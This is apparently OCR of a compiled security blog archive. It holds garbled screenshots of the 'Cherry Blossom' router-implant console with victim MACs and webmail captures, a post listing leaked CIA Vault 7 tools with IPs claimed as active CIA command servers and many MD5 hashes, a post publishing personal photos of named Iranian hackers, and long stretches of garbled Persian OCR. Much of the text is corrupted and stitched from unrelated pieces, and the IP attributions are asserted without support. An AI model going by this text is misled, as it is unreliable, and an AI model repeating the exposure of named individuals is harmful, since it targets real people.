2010-11-29 22:25:28.0 2010-11-29 22:01:18.000 


MKIT Belkin 00:17:3F 40:01:7C 
MI cir Linksys ¥ WRT3OON v2 00:18:39:90:18:C4 2010-11-29 19:18:12.02010-11-29 19:10:02,000 


C4 2010-11-29 18:01:01.02010-11-29 17:47:22,000 


MKIT = WRT300N v2 00:1 2:39: 90:18: C4 2010-11-24 20: 103: 40, 0 2010-11-24 193831 000 


MKIT WRTS4GL 00:25:90:47:73.F5 
MKIT WAT54GL 00:25:96:47:73:F5 
ee 


MKIT WRTS4GL 00:25:90 :47:73:F5 


MKIT WATS4GL 00:25:90 47;73:F5 
MKIT WRTS4GL 00:25:90 :47:73:F5 
MKIT 


7: 
T RTSé L 00:25: A773F 


download 0.3 MB 
download 1.7 MB 
download 1.3 MB 
download 0.1 MB 
download 1.0 MB 
download 0.4 MB 
download 1.9 MB 
download 3.3 MB 
download 9.6 MB 
download 0.4 MB 
download 75.2 MB 


KIT ar 25:90-47.73F5 


MKIT WRTS4GL 00:25:90:47:73:F5 

MKIT WRTS4GL 00:25:9C:47:73:F5 
MKIT WATS4GL 00:25:90 :47:73:F5 
MKIT WRT54GL 00:25:90:47:73:F5 


-MKIT WRTS4GL 00:25:9C:47:73-F5 
MKIT WRTS4GL 00:25:90:47:73-F5 
MK ATISFS 
MKIT WRTS4GL 00: 25:90:47:73F5 


224A) 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel111 


7258 


2010-11-13 01:28:47.0 2010-11-13 01:04:56,000 
2010-11-08 21:31:26.02010-11-08 21:16:25.000 
2010-11-05 21:25:27.0 2010-11-05 21:23:38.000 
2010-11-05 21:23:36.0 2010-11-05 21:22:46.000 
2010-11-05 21:22:47.0 2010-11-05 21:21:35.000 
2010-11-05 21:21:36.02010-11-05 21:19:48.000 
2010-11-05 21:19:49.0 2010-11-05 21:18:37.0 
2010-11-05 21:17:57.02010-11-05 21:08:05,001 
2010-11-05 21:07:37.0 2010-11-05 21:07:30.0 
2010-11-05 21:06:45.0 2010-11-05 21:04:54.001 
2010-11-05 21:04:11.0 2010-11-05 21:00:11.0 
2010-11-03 22:00:26.0 2010-11-03 21:46:31,001 
2010-11-03 20:48:49.0 2010-11-03 20:32:47.0 
2010-11-03 20:32:01.02010-11-03 20:26:11.001 
2010-11-03 20:25:45.0 2010-11-03 20:23:28.0 
2010-11-03 20:20:52.0 2010-11-03 20:15:08.001 
2010-11-03 20:01:28.0 2010-11-03 19:43:28.0 
2010-11-03 18:57:31.02010-11-03 18:33:26.001 
2010-10-13 22:04:20.0 2010-10-13 22:00:01.0 


__2010-10-13 21:12:55,02010-10-13 2042:31.0LAY, 


—____——-- 


SS 
Current Time: 2010-12-17 17:48:48.452 


Gitn® avant VPN Data 


* I 


<<<1>o>> 


File File Size FlyTrap Last Modified Start Time » WLAN MAC LANMAC 
<<<1>>> 


Back to VPN Data 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:17:43.594 


7259 


I 


7260 


Harvest Data 


Cheny #¥ Blossom 


<<<1234567s>5> 


Content 
root@locathost. localdomain 


root@locathost. localdomain 
root@localhost. localdorain 
root@localthost. Localdomain 
root@localhost. localdosain 
root@locathost. localdomain 
root@locathost. localdomain 
root@localthost. localdorain 
root@locathost. localdomain 
root@locathost. localdomain 
root@locathost. localdomain 
root@locathost. localdomain 
root@localhost. localdomain 
root@locathost. localdomain 
root@localthost. localdomain 


root@localhost. localdomain 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 


Filter Origin Client MAC ElyTrap 
Webmail Email 00:0D:60:CD:7E:B0 Create Target SlimBoyl 
Create Target 
Webmail Email 00:00:60:CD:7E:B0 Create Target SlimBoyl 


Webmail Email 00:00:60:CD:7E:80 Create Target SlimBoyl 
Create Target 


Create Target 
Create Target 


Webmail Email 00:0D:60:CD:7E:B0 Create Target SlimBoyl 


Webmail Email 00:00:60:CD:7E:80 Create Target SlimBoyl 


Webmail Email 00:0D:60:CD:7E:B0 Create Target SlimBoyl 

Webmail Email 00:0D:60:CD:7E:80 Create Target SlimB = 
Create Target 

Webmail Email 00:00:60:CD:7E:80 Create Target SlimBoyl 

Webmail Email 00:0D:60:CD:7E:80 Create Target SlimBoyl 


Create Target 
Webmail Email 00:0D:60:CD:7E:80 Create Target SlimBoyl 


Webmail Email 00:0D:60:CD:7E:80 Create Target SlimBoyl 
Webmail Email 00:0D:60:CD:7E ‘80 Create Target SlimBoyl 


Create Target 


Webmail Email 00:00:60:CD:7E:80 Create Target Sinan 
f Tar 


Webmail Email 00:0D:60:CD:7E:80 Create Target SlimBoyl 
Webmail Email 00:0D:60:CD:7E:80 Create Target SlimB = 


Webmail Email 00:0D:60:CD:7E:80 Create Target SlimBorl 


a a en 
y 


Create Target 


iii —o—4 


23> 


Current Time: 2010-12-17 18:18:19.648 


Gene aveccen Firmware Upgrade Alerts Aa 


<<<1>>> 


Date vy Elytrap Type Client MAC Clit 
2010-11-29 22:30:17.0M KIT Belkin 00:17:3F-40:01:7C Upgrade attempted 00:24:7E:DE:9A:BA192 
2010-11-29 22:28:57.0M KIT Belkin 00:17:3F-40:01:7C Upgrade page visited 00:24:7E:DE:9A:BA 192 
2010-11-29 22:27:10.0M KIT Belkin 00:17:3F :40:01:7C Upgrade page visited 00:24:7E:DE:9A:BA 192 
2010-11-29 22:25:32.0 MKIT Belkin 00:17:3F:40:01:7C Upgrade page visited 00:24:7E:DE:9A:BA 192 
2010-11-25 01:42:28.0M KIT Linksys WRTSOON v2 00:18:39:90:18:C4 Upgrade page visited00:1E:65:F2:0F BO 192 
2010-11-25 01:42:23.0M KIT Linksys WRT3OON v2 00:18:39-90:18:C4 Upgrade page visited00:1E:65:F2:0F BO 192 


2010-11-25 01:40:50.0M KIT Linksys WRT3OON v2 00:18:39:90:18:C4 Upgrade page visited 00:1E:65:F2:0F:BO 192 
2010-11-25 01:40:47.0 M KIT Linksys WRTSOON v2 00:18:39:90:18:C4 Upgrade page visited00:1E:65:F2:0F:B0 192 
2010-11-25 01:35:30.0M KIT Linksys WRT3OON v2 00:18:39:90:18:C4 Upgrade page visited00:1E:65:F2:0F:BO0 192 


2010-11-03 22:06:14.0 M KIT WATS4GL 00:25:90 :47:73-F5 Upgrade page visited00:1E:65:F2:0F:B0 192 
2010-11-03 18:02:05.0M KIT WRTS4GL 00:25:90 :47:73-F5 Upgrade attempted 00:24;7E:DE:9A;BA192 
2010-10-27 17:18:23.0M KIT Belkin 00:17:3F:40:01:7C Upgrade attempted 00:24:7E:DE:9A:BA192 
2010-10-27 17:15:06.0MKIT Belkin 00:1 7:3F:40:01:7C Upgrade page visited 00:24:7E:DE:9A:BA 192 
2010-10-15 23:27:19.0FT3 00:13:10:44:98:AD Upgrade page visited 00:21:86:61:4B:AA 192 
2010-10-15 23:27:05.0FT3 00:13:10:44:98:AD Upgrade attempted 00:21:86:61:4B:AA 192 
<<<1>>> 

fac J » jz 

Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 17:45:30,277 


7261 


7262 


Cheny ¥#¥ Blossom 


Windex Alerts 


<<<1>>> 


Target 
al lef.com 


abc@def.com 
00:1E:65:F2:0F BO 
00:1E:65:F2:0F-BO 


00:1E:65:F2:0F:BO 
00:1E:65:F2:0F Bo 


O0:1E :65:F2:0F:B0 
00:1E:65:F2:0F-BO 


00:1E:65:F2:0F:B0 


abe@def.com 
00:1E:65:F2:0F 80 


Receive Time 
2010-11-30 17:20:41.0Pending 
2010-11-30 02:12:19.0P ending 
2010-11-30 02:02:56.0 Unknown 
2010-11-30 01:59:42.0 Unknown 
2010-11-30 01:39:31.0 Unknown 
2010-11-30 01:21:00.0 Success 
2010-11-30 01:14:00.0Success 
2010-11-30 00:58:54.0 Pending 
2010-11-30 00:05:16.0Failure 
2010-11-29 23:45:31.0 Pending 
2010-11-29 23:38:17.0Failure 
2010-11-29 23:33:15.0Failure 
2010-11-29 23:29:09.0 Unknown 
2010-11-29 22:01:19.0 Unknown 
2010-11-29 19:09:53.0 Unknown 


smith test2@hotmail.com 2010-11-29 17:46:18.0 Unknown 


abe@def.com 

00:1E:65:F2:0F BO 
00:1E:65:F2:0F:B0 
OO:;1E :65:F2:0F BO 


abc@def.com 


00:1E:65:F2:0F-B0 
00:1E'65:F2:0F:BO 
00:1E:65:F2:0F-Bo 


abc@def.com 


<<<1>>> 


= 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 


2010-11-24 23:54:48.0Pending 
2010-11-24 22:13:45.0 Success 
2010-11-24 21:57:07.0Failure 
2010-11-24 21:21:05.0Failure 
2010-11-24 19:39:31.0Unknown 
2010-11-13 01:04:56.0 Pending 
2010-11-08 21:17:17.0 Redirected 
2010-11-03 21:46:33.0Pending 
2010-11-03 21:45:23.0 Redirected 
2010-11-03 20:32:51.0 Redirected 
2010-11-03 20:26:06.0 Redirected 


- 2010-11-03 20:23:24.0 Redirected 


2010-11-03 20:15:03.0 Redirected 
2010-11-03 19:43:24.0 Redirected 
2010-11-03 18:33:28.0 Redirected 


y Windex Status Updated 


i 


Client MAC 
2010-11-30 17:20:01.000:24:7E:DE:9A:BA 192.168, 
2010-11-30 02:12:19.0 00:1E:65:F2:0F BO 192.168, 
2010-11-30 02:03:47.000:1E:65:F2:0F BO 192,168, 
2010-11-30 01:59:59.000:1E:65:F2:0F BO 192.168, 
2010-11-30 01:39:37.000:1E:65:F2:0F:B0 192.168, 
2010-11-30 01:21:24.0 00:1E:65:F2:0F:B0 192.168, 
2010-11-30 01:14:44.000:1E:65:F2:0F:B0 192.168, 


2010-11-30 00:58:54.000:1E:65:F2:0F BO 192.168, 


2010-11-30 00:05:52.000:1E:65:F2:0F:BO 192.168; 
2010-11-29 23:45:31.000:1E:65:F2:0F:BO 192.168, 
2010-11-29 23:38:58.000:1E:65:F2:0F BO 192,168; 
2010-11-29 23:34:12. 000:1E:65:F2:0F:B0 192.168, 
2010-11-29 23:29:46.000:1E:65:F2:0F:BO 192.168, 
2010-11-29 22:01:37.000:1E:65:F2:0F BO 192.168, 
2010-11-29 19:10:10.000:1E:65:F2:0F:BO0 192.168, 
2010-11-29 17:46:39.000:1E:65:F2:0F:BO 192.168, 
2010-11-24 23:54:47.000:1E:65:F2:0F:B0 192,168, 
2010-11-24 22:14:07.000:1E:65:F2:0F:BO 192.168, 
2010-11-24 21:58:42.000:1E:65:F2:0F:BO 192.168, 
2010-11-24 21:44:58. 000:1E:65:F2:0F:B0 192.168, 
2010-11-24 19:39:37.000:1E:65:F2:0F:BO 192.168, 
2010-11-13 01:04:56.000:08:97:29:87:5D 192.168. 
2010-11-08 21:17:31.000:1E65:F2:0F BO 192,168 

2010-11-03 21:46:33.000:1E:65:F2:0F:BO 192.168 

2010-11-03 21:45:31.000:1E:65:F2:0F BO 192.168 

2010-11-03 20:33:02.000:1E:65:F2:0F:B0 192.168. 

2010-11-03 20:26:34.000:1E:65:F2:0F:BO 192.168 


2010-11-03 20:24:33.000:1E:65:F2:0F:B0 192.168 


2010-11-03 20:15:44.000:1E:65:F2:0F:BO 192.168 
2010-11-03 19:44:11.000:1E:65:F2:0F:B0 192.168 
2010-11-03 18:34:02.000:1E:65:F2:0F BO 192,168 


Client IF | 


\M] 


— - h 
Current Time: 2010-12-17 17:44:49.558 


None aiitcen| Diagnostic Data A 


3 
<<<1234567>>> 

Flytrap Type Message | | 

cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:DC:2A:69 Open Connection bi=0 | 
J Serial 320N 68:7F:74:29:4B:AA Open Connection bi=0 

12.16. 1D:7E:DC:2A: bi=0 

biel 
bi=0 
bi=1 
12.16. :1D:7E:DC:2A:69 Open Connection bind 
SE ETT EP ETT INNER EECETE TE Connection bi=1 
cb-vpn Est 18 12.16. - LAN=00: we TE: DC: 2A: 69 Open Connection bi=0 
bi=1 
bi=0 
bi=1 
bind 
cb-vpn PoP 192.12 16.81 See ee “pallial bi=1 
¢eb-vpn PoP 192.12.16.81 LAN=00:1D:7E:OC:2A:69 Open Connection bind 
ee ae Connection bi=t 
cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:DC:2A:69 Open Connection bi=0 
cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:0C:2A:69 Open Connection bi=1 
cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:DC:2A:69 Open Connection bi=0 
cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:0C:2A:69 Open Connection bi=1 
cb-vpn PoP 192.12.16.81 LAN=00:1D: TE: ‘DC: 2h; 69 Open Connection bi=0 
bi=1 
bi=0 
bi=t 
bi=0 
bi=1 
bind 
bi=t 
bi=0 
bi=1 
bi=0 

bi=t eI 

re ay >| 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:19;26,052 
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Sune avec OWT Report Configuration 


a74aM 


Operation: | perautt ~ 

Start Time: (25 apr 2012. | SI 08-31-43 

End Time: 25 apr 2012. | =) 08.3313 
Output Directory; 


Generate 


Report completed successfully!!! 
Results can be found in JhomeljeffisrciCherryBlossom/Cherryweb/context/Reports/DEFAULT 


User cbuser Logout 


rk 
Last Alert: 2012-04-19 08:14:42.0 Target: you@suck.eggs Current Time: 2012-04-25 08:34:36.113 


In today’s modern cyber warfare age multiple international bodies both commercial 
government-sponsored and non-profit organizations strive to provide both legal and tac- 
tical advice and practical recommendations including "best practices" on the legal and 
operational applicability of today’s modern cyber warfare arms race that often thankfully 
goes beyond the usual in-depth and throughout analysis of yet another currently circulating 
malicious and fraudulent spam and phishing including malware campaigns. 


What was once a very specific skillful set of both technical and operational "know-how" 
courtesy of the NSA in terms of launching both offensive and defensive cyber warfare 
operations is today’s modern alternative in the face of CIA’s recently launched offensive 
cyber warfare weapons program which based on the publicly accessibly leaked material 
appears to go beyond the usual lawful surveillance type of tools including today’s modern DIY 
(do-it-yourself) malware-releases and basically signals a trend and possibly an international 
including within the U.S Intelligence Community standard in terms of working on high-grade 
nation-empowered offensive cyber warfare weapons. 


7264 


With the CIA slowly entering the cyber warfare arms race it should be considered as a 
privilege to actually having a working or in-the-works cyber weapon type of arsenal that could 
possibly motivate other U.S Intelligence Community agencies and actually raise the eye-brows 
of certain members of the U.S Intelligence Community in particular the NSA in the context of 
having another agency actively develop and work on cyber warfare weapons. What is the CIA 
up to in terms of offensive cyber warfare weapons and actual production of high-grade and 
nation-state sponsored malicious software? 


Thanks to a publicly accessible leaked archive of classified and potentially Top Secret in- 
formation on CIA’s offensive cyber warfare weapons program we can clearly distinguish 
approximately 24 Top Secret offensive cyber warfare weapon programs and actual tools which 
I’ll extensively profile in this post and offer practical and relevant advice on how organization’s 
and companies can protect themselves from these type of threats. 


¢ "Dark Matter" - iPhone and MAC hacking 

¢ "Marble" - CIA’s Marble Framework for malicious code obfuscation 

¢ "Grasshopper" - CIA’s Grasshopper framework for producing Windows-based malware 
¢ "HIVE" - publicly accessible C &C (Command and Control) infrastructure development 
¢ "Weeping Angel" - SmartTV hacking and eavesdropping project 

¢ "Scribbles" - Web-beacons based leaked documents tracking tool project 


¢ "Archimedes" - local area network (LAN) hacking tool project that would eventually phone 
back to the CIA’s C &C infrastructure 


e "AfterMidnight" - Windows-based malware 

e "Assassin" - Yet another Windows-based malware 

e "Athena" - Yet another Windows-based malware 

¢ "Pandemic" - Yet another Windows-based malware 

¢« "Cherry Blossom" - Compromised and backdoored Wireless device and router firmware 


¢ "Brutal Kangaroo" - Covert communication channel using custom-embedded and shipped 
USB drives 


¢ "Elsa" - Geo-location aware Wireless device and router exploitation project 
¢ "OutlawCountry" - Linux based malware 
¢ "BothanSpy" - Windows-based malware 


¢ "Highrise" - Android-based mobile malware 
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¢ "Imperial" - Mac OS X trojan horse project 

¢ "Dumbo" - Web cam hacking and compromise project 

¢ "CouchPotato" - Video and Web cam hacking and compromise project 
¢ "ExpressLane" - biometrics database compromise hacking project 

¢ "Angelfire" - Windows-based malware 


¢« "Protego" - Missile-control-based malicious software 


Today’Ss monocultural insecurities-based inter-connected World in combination with good 
old-fashioned OSINT methodologies could easily prove handy to nation-state cyber weapons 
building groups and teams in the context of actually doing their home work and basically 
adapting to good-old fashioned standardized communication approaches and technologies for 
the purpose of exploiting and building offensive cyber weapons on the top of it. 


Case in point is the majority of market-leading open-source firmware releases including the 
actual proprietary and off-the-shelf internal U.S Intelligence Community based and driven in- 
cluding possibly sponsored bug bounty programs including the actual outsourcing of the actual 
vulnerability discovery and exploit development to a third-party including the use of proprietary 
and publicly accessible off-the-counter exploit and vulnerability development services courtesy 
of malicious parties or legitimate public services and projects. 


The very notion that the CIA is developing cyber warfare weapons should be considered a 
7266 


privilege in case they’re actually used against an online adversary or a foreign nation. In terms 
of attribution it should be clearly noted that the active outsourcing and utilization of purely 
malicious online infrastructure including the use of legitimate online infrastructure acting as a 
C &C infrastructure should be clearly considered an option in case the CIA doesn’t want to end 
up having its inventory of hijacked PCs and hosts actually compromised or actually having its 
C &C infrastructure taken offline courtesy of security researchers or the Security Community. 


I’ve also managed to find two currently active C &C servers courtesy of CIA’s currently active 
and ongoing Vault 7 cyber weapons program including an actual MD5 for a ClA-produced and 
sponsored mobile malware: 


PTRPTR 


= a 
24.176.227.182 .,, _ 024-176-227-182.biz.spectrum.com iI meetin ce| mentcui Sasriete: ceccieae, 


hxxp://70.237.151.14 
7267 


hxxp://24.176.227.182 


Sample visual traceroute for the first C &C server: 


Sample visual traceroute for the second C &C server: 
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Sample mobile malware MD5 sample: 


MD5: 05ed39b0f1e578986b1169537f0a6b6fe 


Related CIA-themed MD5s involved in various ClIA-themed malicious and fraudulent online 
campaigns: 


7269 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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f2fc11f71c3008cd2e4594437d156f4e 


13af7fb4534750fc3d672fd359fdf20c 


a5b17f9ffcO6d2acbb331df24ad0fb54 


d198fla9cdf76ed5bc0e33a817bd2ae5 


b489e6956a2a865788546c0fb6c9163c 


2be39ec8320637f3f60d4c040a0d315d 


1leddcd70f71ldefe214ae8912c63e5f4 


3afe914cd4c039a6f44c34741af0182b 


9d2932b52a824bce66a5587c3afeedaa 


279730a8e7b23a8bf2cO6aea0c32b1b0 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


4eat2b3244cbf3b467cf4db79a955275 


d91a46d0b29f34bdd3277fe53dc1c031 


c7a35d78dc3f47c880eb7c4ee20d73d5 


44cb9b2a174720e2dd11abb6b7897926 


112fd3445f9fb60abd4288002fe9cfcc 


Oc4dff8114b1830c985cf5adf14b415c 


98f676004fc4f3330d055d65d61f99c8 


6c4158461dd177fd114c27d9ad5ee809 


01d9544d0a151caa67cfd8eb0f17640d 


f6f27ec79cb71cdd31c679b636002c49 


90a277ffbedc227fe236foc6af3c5dc6 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


Eee 


ea965f46a287e03a7ab808a05ad2128f 


f11aa2a0674c49f17a9360505626716d 


ceb40a12129334ece4c3953fee950aa7 


ee28dc8eb6abd7 7d33ef7be02a583760a 


f03b81e85706d3b4f8df2d8475dc36aa 


4f5f7297107a2b03c4f62e0c4b7f9871 


01d9544d0a151caa67cfd8eb0f17640d 


f6f27ec79cb71cdd31c679b636002c49 


90a277ffbedc227fe236fbc6af3c5dc6 


ea965f46a287e03a7ab808a05ad2128f 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


f11aa2a0674c49f17a9360505626716d 


ceb40a12129334ece4c3953fee950aa7 


ee28dc8eb6abd7 7d33ef7be02a583760a 


f03b81e85706d3b4f8df2d8475dc36aa 


4f5f7297107a2b03c4f62e0c4b7f9871 


Stay tuned! 


16.4 June 


16.4.1 Exposing Anonymous Greece - An OSINT Analysis (2020-06-18 14:39) 


16.4.2 Exposing Ashiyane Digital Security Team - An OSINT Analysis (2020-06-19 16:08) 
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Dear blog readers, 


| wanted to let you know that I’ve decided to publish a set of high-profile and personally 
identifiable personal photos of all the leading and currently active Iran-based hacking and 
Web site defacement groups with the idea to assist the Security Industry and U.S Law 
Enforcement on its way to properly track down the members of these groups part of my two 
series of actionable threat intelligence type of reports which I’ve recently released and made 
exclusively publicly available for free. 
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¢ [1]Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic 
of Iran - Report - Direct Download Copy 


¢ [2]A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking 
Scene Through the Prism of the Infamous Ashiyane Digital Security Team - Direct Download 


Copy 
¢ [3]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Anal- 


ysis 
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Just to let you know that the second edition of the report which is basically the single most 
popular and comprehensive publicly accessible Technical Collection report on Iran’s Hacking 
Scene was produced and sponsored courtesy of Wallmart Threat Intelligence Team which 


gracefully approached me in terms of producing it and actually allowed me to release it 
publicly for free. 


Sample personal photos of members of Ashiyane Digital Security Team including the group’s 
leader Behrooz Kamalian: 
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SECURITY FORUM 


Laas scam! 02495 agi aSard g Le cul cuial civ gel g Gilwy Edbel sly lgiy culw yl 
iw? GUL, ey ge a Ul las lS ay cules ul YlaiaS IL 52 cugae L sully? no 
veal oasis Sygl gar 9 angi ailuiul 095 culled Jlw cum Jobo 42 Sllre col aid Ia 
Olney ail vo whut og 55 nord 9 hol slat! orgt yy cule ol UlaiaS IU core 
cule gil 42 Trade Glee! jl olail WGsh> ULE 42 Gigine aigkas wha! oS 
eS pis pli I 42 samry yg a 0995 Ulure culled Guu gil jl cule aimless orge 
9 Sut cial ainej 42 9 WwW.ashiyane.ir cule 42 wludl ole! 9 olbLi! slid 
VBulletin 4.2.0 multiple XSS #4 WalS 9 array rag S ailaied virial og 5 cul 53 aw ej) adh aaly> acolo! lay pus 

vulnerabilities Ubu! 42 caudal 5 Se cole ceriSin 9 ony! Alexa saine cul aul a 9 029 iinne 
7 joaieg calls Sil ulin camo jl gpSgle 4 9 0297 ailuiol Gisial 09 5 a Gleie cule yl y2 clan 9 LEM! gir aS Gaines cowl 


SQI yo ad pate Sl ysiwa cw jgal Sul <~~ 4 veal anlgd Gigild 2,54, gaia 553 Ug Ul jl syle aruui aigS » 
~~> injection 
auiS pSoS lat 9) 93 4 Fargas whe! yer! slglay! uns! Jie 
Robo ¢ 
pz Ql 4 


wattle pe je ak erie 959 gd Une unl jl syloye aS wigS aa sath: no dogire aleil riniel ai gly Gear af 
Ayal ptiwogld | ala! Soig iSII alae | alas! yes! p> clad | ual paw, glasl | lal tsa oS ui | cule oll 


Paa2 


facebook 


“= = 


eT Kat dl 
pial ople choy oueen : 


Ashiyane Digital Security Team ( Orginal =v Likec 
Page ) 


puters/ Technology 
https://www.facebook.comyhooman.hide 


oede uwles WelSen oil & wooo! & DLs Sly 


7353 


7354 


7358 


7359 


7360 


7362 


7363 


7364 


7365 


7368 


7369 


7370 


ICT ls 


(FIAHIHA) ENN © yLoud = Te9d CumgST 10 ITAP ole sfozo TF dtige 


SF 11,5 31 yf cla Se aloo 0, 90 bub 


ek 


| 
| wh So oh Fj 55 9859) 0 Hye) el SD pdiey SK daa lS lead HT ticle 


cAlMSUBDOMAIN) 4b» jeepeobiz gals AME Wal g hh AI Sel 
Cb SLT gtiayy "ET Jplog Shag oe 
ean aS pra ec SS peti ets a5 glia gS cased BIS plats» 
pcb SAF 982, paca pj Kb 15 
| GU pian Sadar gplarn 92a 529509 Clap Sch glycated de AT" scaled 
pei g\Smaly hel 
| scucleasT (ZONE-H) ql 335 actly rod Sa glace SJ 
; cle pb J pita gigas NASA.GOV 35 24) -2T oleh oleate 


a © ame fia eo ee 


444<<< atS <6 SA 


eins a zit Oe tgif po le) pile 


a 

She Saint A A og gle So sn 
th pt pp pe 9 Pott Fone 

pe Sel rede Tee ny Grmmely PK ree 
Me Sr & An! See SO Be mioy  gk 


Sea ge SF OE hay") leet we sae 

(oar eue) 

PR Ace lg Lapa oS go Bb yo tly 
ib ine J pe siping Shee 9 9? gob perye aio he 
Des tte De pert 9 hangs Ve Snel, Jeet J tape 
a pled ania Se Aa Sg Sb pte 
ay soe 

Sagite lene 1) en aclir AF iu sey 

9 A ne ee te J he 


Fn SMe ghomeye ll pial AS 9 pat cae de yr 
ttn thd og F shat late 

SAF Fa lad oad p shee Ke sland ony 

he pele he) Se JE eg pitge st pond ghee > iby 
aloe Ne aly Fee wot Se + ID site sige oF 
el eee CaF gn pefSnd la dang od ToS Se wie 
Ale i Id Pat pe che J mere Se 
ele yee ge he Strode 8 pay spt vnmialioe Ve 
et mee zix che ot pS, 


Sad, Ke pe lee GS gt 

Bre hae hae Bdge By oe ghd Wal Oe 
apie gga > y2y hen gis Jo peered Se 
Ss ah tip pad Ad, pr yr garnet he SPCR 25 go 
phe) peat epimlyige E25 gt Sey glotel en 

we 


= 


7371 


eo .——-s — , —! i 


7372 


=a Anne wisi : 
G8ae—__— . 
Nh et END 


SAR Rar 22 LST og F poe HILT Jy oe 


— 49 FSO Si quesT 35 Jilio 591 silSs sol 


ee a ae 


ate” sy 


hee bgp pte gal Bava, pee 
yigbaierd Eevee ae a ae 
pe A ery 


te Ngee ol alge) wetted Sm jd diana tome 
PR ci pee ote fy) ie ewe 


ae. 


Arm hed A 
Srna kul estdheeed arkareiend tidiemomeodoated tae 
An pied gine spat om gate 


7373 


7374 


oie PP oa Slat Soe 9 oe tlle AS ge Be 
SA HE shermines Jy 2,5 atlas iby Jaren 
Saf atlye alld ppm 

sel Si ny he E mc athe ok Bet 0 sad 
ge lee yn gk A peer gt gS 
eel gn tam nen tjyiod 

Mod yp Ke Bae p ti lagS Sipe 
Sip pe Sa Sate phy amags pled gamed JS sop 
Pr gS IS Sm pe od fai gad pie age 
wot BE pepe yma 

BO am esse Oy tomer cod J le ally 

ee We ee 
Ry Sen glowing Aut peep Jon tle tS yo So 


wt So Sg F 3} 
Tad Be prt Ole 
Lee p deen lal Me ngeh sent pn shop be Pe 
dae gh jell eS Sit perdi p tree be ent aed 
Pe adh ghee ch pe Pale wo py gore? Si 
fa gear nd gpl face 
neal gd 


Bed ABSA chad poy Hab Lt clr 
Sas Soy Ls 
nat ep ag ple fore, 
I King jill she 2 
Raayped Sn Sey Od 
pga sate gy 0 0 Ninh 


Fackund (pits 


Dp be ghielonsan fed 9 ty ste! aang bo 
ey) 54 SS ar Saat ne 
Sin? pe LOSS ol AS ge Salad Wl Hie Rl 
Peel ~ BG) SE pi Se te Inte dp ne! 
POM Shs Sie) i) ap} py Tord po 


dd ddddddds 


ad yp Safed 


ke do Ne ince lh a aE pm ghtclit 9 he hal 
ty gh pada ae oe Ko 

stl Sale te SF fole socahe Slay Sam 
Sadtge 09,5 Cal pete 

eee nel Yee inp Aap lh shy ecco 
iF dale ghtncacee 2 yh ly tage wie Meighe AE cee Mo 
rm ag glee be pel Sly aye gle pte 
Nl Ante caeed* peely pees pill lag od eh F 
peed Sane th IE nnn Silent heal Soh ol pase 

Sap UES pent paler yd selon S99 

pel ae yy ip tee le the ahi al ae Id org 
wernt BD Boe hel Jey Jae 9 hE met 
ph NE as Ah at ag IT Spe hs oye 
ttl sane fay be Fewer st Zt 

Satya dp 2 p jae 

PO pad > oy AAA Joo SH) PY 
han FS A PE PT Br 

Tage ae OF Sed Senha Shae seth J ame 

DF dent F Sal meet ach gloat he ple 
Sepa alee OF ayy RI nny TT Kam 
alee Bet ah Bb ge pits SRS pl il Pw oh Se 
aS Sah part 

ane J Ppp woe Se ep Bor we gy 

by ett Sm oF pment omctye pee Rey 
I ame acl itl pel glace Ct eet ppine 
Spe San hy phe galt gh J Sales poche Mel de J 
Sept Som pin ST je aged & Slade pt cache Cerne 
ned 

Lypne Pye ale 

we dS che rat) ghgiat', Reng ten 

we et iy yd ake py heen Sen phe ai 
f cad 

lhe JA al A pally slole JVs Papa? 
deg 5 ght ns pen sche gs ye PEE 

pS Saal tt glare aim he gy 5 aller 
Faget geclee eat + aS pel Press Tye ae 
Be tae) pale ae tad Jom pw hd af So 
hike Singeien aaa, 


Sooty (RT! JOS ade PF ay ony he Sine 
wat glastl  glnmlane 9 anne! le Bl eRe tokayy 
er Hie te S eh SOI pilin ct ae 


Se ph ne So BO tian PSE 
whiede gle ep ee oh PE app ade 
Shee lng ce pp le ala agg watinye 08S olde! 
pctle J plang shal amie 54,1) "Persian Gols 

Spnelin de nea 

AD y ln gle pling Foye hej cha vale 
ahr a ty by haem SF eel Faye Sa | ple 
Se tity aS oD pcp Se Sed spy sity o3lo Jp 
a ae Sa aA gd aul ge Pron 

perf Sal, caelny wae slece & gd) ae 
P Sipe pie ad ge SS fee og J gh 
PSA eee te fp cS ole natty LG) 
ene ot eee 


dated Hobs Jib Son ian J Ay sine 
Oe ae athe a pid} pecan dS +) shel pat 
— 

of JE i sin eae 

9 Se ce eS ae pat A Jie OE vate ae 
cad Jd Ae Kel Jal oat Pe gine 

tik ale fea nf soot 

Reet pn i nae aed Sore 2 fay pst ety 
met ae we ah Sep fee hone 

fagtdy ately 

aE aa aah my nd ogi ol we ploy Soe 
ete FLAS dati pe gad Paes 

Sin Raed 9 ae Seely hae pak ponte 
tal peel tat soar ge SY 9 SPI al) % remy 
ae 


sree whe bells lps yf slain de 
rp ae Sd 
eS od al Nem lis 
BP sas! Soe 
Sale at 
Berqennlint eI, 
met, 


a i ty Catena Aimle ot 

ed 
Ege Send nee I ode get 

Pt Oe pM he eee 


Lad 

Fooly pen Say grit gnc J phone lo 
Petts ey ens ial ged 9 hme 
sorta shat golhie inp ae jae 

ene Seat ceed i Fl Satan ol pte shel le 
Ua 9 ctl pln by AE et Se Aen vt le ta i te 
